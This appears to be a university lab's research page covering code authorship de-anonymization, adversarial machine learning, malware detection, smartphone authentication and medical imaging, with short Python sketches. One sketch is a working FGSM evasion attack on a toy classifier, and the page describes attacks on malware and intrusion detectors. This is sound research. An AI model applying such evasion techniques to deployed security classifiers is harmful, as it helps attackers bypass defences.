This work proposes a Deep Learning-based Code Authorship Identification System (DL-CAIS) for code authorship attribution that facilitates large-scale, language-oblivious, and obfuscation-resilient code authorship identification. The deep learning architecture adopted in this work includes TF-IDF-based deep representation using multiple Recurrent Neural Network (RNN) layers and fully-connected layers dedicated to authorship attribution learning. The deep representation then feeds into a random forest classifier for scalability to de-anonymize the author. Comprehensive experiments are conducted to evaluate DL-CAIS over the entire Google Code Jam (GCJ) dataset across all years (from 2008 to 2016) and over real-world code samples from 1987 public repositories on GitHub.
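A heavily simplified sketch of DL-CAIS's endpoints: a TF-IDF representation of code feeding a random forest for author de-anonymization. The RNN-based deep representation stage described above is elided here, and the code samples are toy stand-ins.

```python
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.pipeline import make_pipeline

samples = [
    "for(int i=0;i<n;i++){sum+=a[i];}",          # author 0 style
    "int i; for(i=0;i<n;++i) total += arr[i];",  # author 1 style
    "while(n--){sum+=*a++;}",                    # author 0 style
    "int j; for(j=0;j<len;++j) total += v[j];",  # author 1 style
]
authors = [0, 1, 0, 1]

pipe = make_pipeline(TfidfVectorizer(analyzer="char", ngram_range=(2, 3)),
                     RandomForestClassifier(random_state=0))
pipe.fit(samples, authors)
print(pipe.predict(["for(int k=0;k<m;k++){s+=b[k];}"]))
```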

Research Projects

Robustness and Adversarial Machine Learning

Deep Neural Networks have achieved state-of-the-art performance in various applications. It is crucial to verify that a model's high-accuracy predictions for a given task derive from a correct problem representation and not from the misuse of artifacts in the data. Investigating the security properties of machine learning models, recent studies have shown various categories of adversarial attacks, such as model leakage, data membership inference, model confidence reduction, evasion, and poisoning attacks. We believe it is important to investigate and understand the implications of such attacks on sensitive applications in the field of information security and privacy.
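As a minimal example of the evasion category listed above, a one-step FGSM perturbation moves an input along the sign of the loss gradient; the toy model and epsilon below are illustrative assumptions, not a specific system we attack.

```python
import torch

def fgsm(model, x, y, eps=0.03):
    """One-step fast gradient sign method (an evasion attack)."""
    x = x.clone().requires_grad_(True)
    loss = torch.nn.functional.cross_entropy(model(x), y)
    loss.backward()
    return (x + eps * x.grad.sign()).clamp(0, 1).detach()

# Toy model on random "images".
model = torch.nn.Sequential(torch.nn.Flatten(), torch.nn.Linear(3 * 32 * 32, 10))
x = torch.rand(4, 3, 32, 32)
y = torch.randint(0, 10, (4,))
x_adv = fgsm(model, x, y)
print((x_adv - x).abs().max())   # perturbation bounded by eps
```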

DL-FHMC: Robust classification · AdvEdge: AML against IDLSes · SGEA: AML against malware detectors · Soteria: Robust malware detectors · Black-box and Target-specific AML · Exploration of Black-box AML

Malware Analysis

Malware is one of the most serious computer security threats. To protect computers from infection, accurate detection of malware is essential. At the same time, malware detection faces two main practical challenges: the pace of malware development and distribution continues to increase, and malware increasingly employs complex methods to evade detection (such as metamorphic or polymorphic techniques). This project utilizes various characterizing features extracted from each malware sample using static and dynamic analysis to build seven machine learning models that detect and analyze malware. We also investigate the robustness of such machine learning models against adversarial attacks.

MLxPack · DL-FHMC: Robust malware classification · SGEA: AML against malware detectors · Soteria: Robust malware detectors · Spectral Representations of CFG · ShellCore

Continuous User Authentication

Smartphones have become crucial for our daily life activities and are increasingly loaded with our personal information to perform several sensitive tasks, including mobile banking, communication, and storing private photos and files. Therefore, there is a high demand for applying usable continuous authentication techniques that prevent unauthorized access. We work on a deep learning-based active authentication approach that exploits sensors in consumer-grade smartphones to authenticate a user. We addressed various aspects regarding accuracy, efficiency, and usability.


AUToSen: Continuous Authentication · Contemporary Survey on Sensor-Based Continuous Authentication

Machine Learning for Social Good

Computer-aided methods for analyzing white blood cells (WBC) are popular due to the complexity of the manual alternatives. We work on building a deep learning-based method for WBC classification. We proposed W-Net, which we evaluated on a real-world large-scale dataset that includes 6,562 real images of the five WBC types. The dataset was provided by The Catholic University of Korea (The CUK) and approved by the Institutional Review Board (IRB) of The CUK. For further benefit, we generated synthetic WBC images using a Generative Adversarial Network (GAN) and shared them for education and research purposes.

W-Net: WBC Classification · Online Toxicity in Users' Interactions with Mainstream Media · Children's Exposure to Inappropriate Comments in YouTube · Synthetic MRI from CT · Sentiment Analysis of Users' Reactions on Social Media

Machine Learning for Medical Images

This project is about synthesizing magnetic resonance images (MRI) from computed tomography (CT) simulation scans using deep-learning models for high-dose-rate (HDR) prostate brachytherapy. For HDR prostate brachytherapy, both CT and MRI are acquired to identify catheters and delineate the prostate, respectively. We propose to build a deep-learning model to generate synthetic MRI (sMRI) with enhanced soft-tissue contrast from CT scans. sMRI would help physicians accurately delineate the prostate without needing to acquire an additional planning MRI.
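A minimal sketch of the Pix2Pix-style objective assumed in this project: an adversarial term from a conditional discriminator plus an L1 term weighted by λ. `G` and `D` are stand-ins for the generator and patch discriminator; λ = 100 follows the common Pix2Pix default rather than our exact settings.

```python
import torch

def generator_loss(G, D, ct, mri, lam=100.0):
    """Pix2Pix-style generator objective: fool the conditional
    discriminator and stay L1-close to the real MRI."""
    fake = G(ct)                                      # synthetic MRI from CT
    pred = D(torch.cat([ct, fake], dim=1))            # condition D on the CT
    adv = torch.nn.functional.binary_cross_entropy_with_logits(
        pred, torch.ones_like(pred))                  # "real" target for G
    l1 = torch.nn.functional.l1_loss(fake, mri)       # pixel-wise fidelity
    return adv + lam * l1

# Toy stand-ins to show the shapes involved.
G = lambda ct: ct                                     # identity "generator"
D = lambda pair: pair.mean(dim=(1, 2, 3)).unsqueeze(1)
ct, mri = torch.rand(2, 1, 64, 64), torch.rand(2, 1, 64, 64)
print(generator_loss(G, D, ct, mri))
```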

W-Net: WBC Classification · Synthetic MRI from CT

Network Security and Online Privacy

Network monitoring applications such as flow analysis, intrusion detection, and performance monitoring have become increasingly popular owing to the continuous increase in the speed and volume of network traffic. We work on investigating the feasibility of an in-network intrusion detection system that leverages the computation capabilities of commodity switches to facilitate fast and real-time response. Moreover, we explore the traffic sampling techniques that preserve flows’ behavior to apply intelligence in network monitoring and management. We also address the increased privacy concerns regarding website fingerprinting attacks despite the popular anonymity tools such as Tor and VPNs.

Traffic Sampling for NIDSs · Multi-X · Exploring the Proxy Ecosystem · Studying the DDoS Attacks Progression

Contact Us

Our Address

308 Doyle Center, Lake Shore Campus
1052 W Loyola Ave. Chicago, IL 60626

Call Us

+1 773 508 3557